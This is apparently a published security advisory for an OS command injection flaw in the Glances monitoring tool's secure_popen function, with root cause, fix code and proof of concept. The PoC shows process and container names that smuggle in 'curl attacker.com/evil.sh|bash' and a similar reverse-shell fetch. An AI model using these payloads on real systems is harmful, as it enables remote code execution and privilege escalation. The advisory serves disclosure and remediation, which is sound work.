PT-2026-25846 · Pypi · Glance

Published

2026-03-16

·

Updated

2026-03-16

·

CVE-2026-32608

CVSS v3.1
7.0
VectorAV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

The Glances action system allows administrators to configure shell commands that execute when monitoring thresholds are exceeded. These commands support Mustache template variables (e.g., 
{{name}}
, 
{{key}}
) that are populated with runtime monitoring data. The 
secure popen()
function, which executes these commands, implements its own pipe, redirect, and chain operator handling by splitting the command string before passing each segment to 
subprocess.Popen(shell=False)
. When a Mustache-rendered value (such as a process name, filesystem mount point, or container name) contains pipe, redirect, or chain metacharacters, the rendered command is split in unintended ways, allowing an attacker who controls a process name or container name to inject arbitrary commands.

Details

The action execution flow:
  1. Admin configures an action in glances.conf (documented feature):
[cpu]
critical action=echo "High CPU on {{name}}" | mail admin@example.com
  1. When the threshold is exceeded, the plugin model renders the template with runtime stats (glances/plugins/plugin/model.py:943):
self.actions.run(stat name, trigger, command, repeat, mustache dict=mustache dict)
  1. The mustache dict contains the full stat dictionary, including user-controllable fields like process name, filesystem mnt point, container name, etc. (glances/plugins/plugin/model.py:920-943).
  2. In glances/actions.py:77-78, the Mustache library renders the template:
if chevron tag:
  cmd full = chevron.render(cmd, mustache dict)
  1. The rendered command is passed to secure popen() (glances/actions.py:84):
ret = secure popen(cmd full)
The secure popen vulnerability (glances/secure.py:17-30):
def secure popen(cmd):
  ret = ""
  for c in cmd.split("&&"):
    ret +=  secure popen(c)
  return ret
And secure popen() (glances/secure.py:33-77) splits by > and | then calls Popen(sub cmd split, shell=False) for each segment. The function splits the ENTIRE command string (including Mustache-rendered user data) by &&, >, and | characters, then executes each segment as a separate subprocess.
Additionally, the redirect handler at line 69-72 writes to arbitrary file paths:
if stdout redirect is not None:
  with open(stdout redirect, "w") as stdout redirect file:
    stdout redirect file.write(ret)

PoC

Scenario 1: Command injection via pipe in process name
# 1. Admin configures processlist action in glances.conf:
# [processlist]
# critical action=echo "ALERT: {{name}} used {{cpu percent}}% CPU" >> /tmp/alerts.log

# 2. Attacker creates a process with a crafted name containing a pipe:
cp /bin/sleep "/tmp/innocent|curl attacker.com/evil.sh|bash"
"/tmp/innocent|curl attacker.com/evil.sh|bash" 9999 &

# 3. When the process triggers a critical alert, secure popen splits by |:
#  Command 1: echo "ALERT: innocent
#  Command 2: curl attacker.com/evil.sh  <-- INJECTED
#  Command 3: bash used 99% CPU" >> /tmp/alerts.log
Scenario 2: Command chain via && in container name
# 1. Admin configures containers action:
# [containers]
# critical action=docker stats {{name}} --no-stream

# 2. Attacker names a Docker container with && injection:
docker run --name "web && curl attacker.com/rev.sh | bash && echo " nginx

# 3. secure popen splits by &&:
#  Command 1: docker stats web
#  Command 2: curl attacker.com/rev.sh | bash  <-- INJECTED
#  Command 3: echo --no-stream

Impact

  • Arbitrary command execution: An attacker who can control a process name, container name, filesystem mount point, or other monitored entity name can execute arbitrary commands as the Glances process user (often root).
  • Privilege escalation: If Glances runs as root (common for full system monitoring), a low-privileged user who can create processes can escalate to root.
  • Arbitrary file write: The > redirect handling in secure popen enables writing arbitrary content to arbitrary file paths.
  • Preconditions: Requires admin-configured action templates referencing user-controllable fields + attacker ability to run processes on monitored system.

Recommended Fix

Sanitize Mustache-rendered values before secure popen processes them:
# glances/actions.py

def escape for secure popen(value):
  """Escape characters that secure popen treats as operators."""
  if not isinstance(value, str):
    return value
  value = value.replace("&&", " ")
  value = value.replace("|", " ")
  value = value.replace(">", " ")
  return value

def run(self, stat name, criticality, commands, repeat, mustache dict=None):
  for cmd in commands:
    if chevron tag:
      if mustache dict:
        safe dict = {
          k: escape for secure popen(v) if isinstance(v, str) else v
          for k, v in mustache dict.items()
        }
      else:
        safe dict = mustache dict
      cmd full = chevron.render(cmd, safe dict)
    else:
      cmd full = cmd
    ...

Fix

OS Command Injection

Weakness Enumeration

CWE-78

Related Identifiers

CVE-2026-32608
GHSA-VCV2-Q258-WRG7

Affected Products

Glance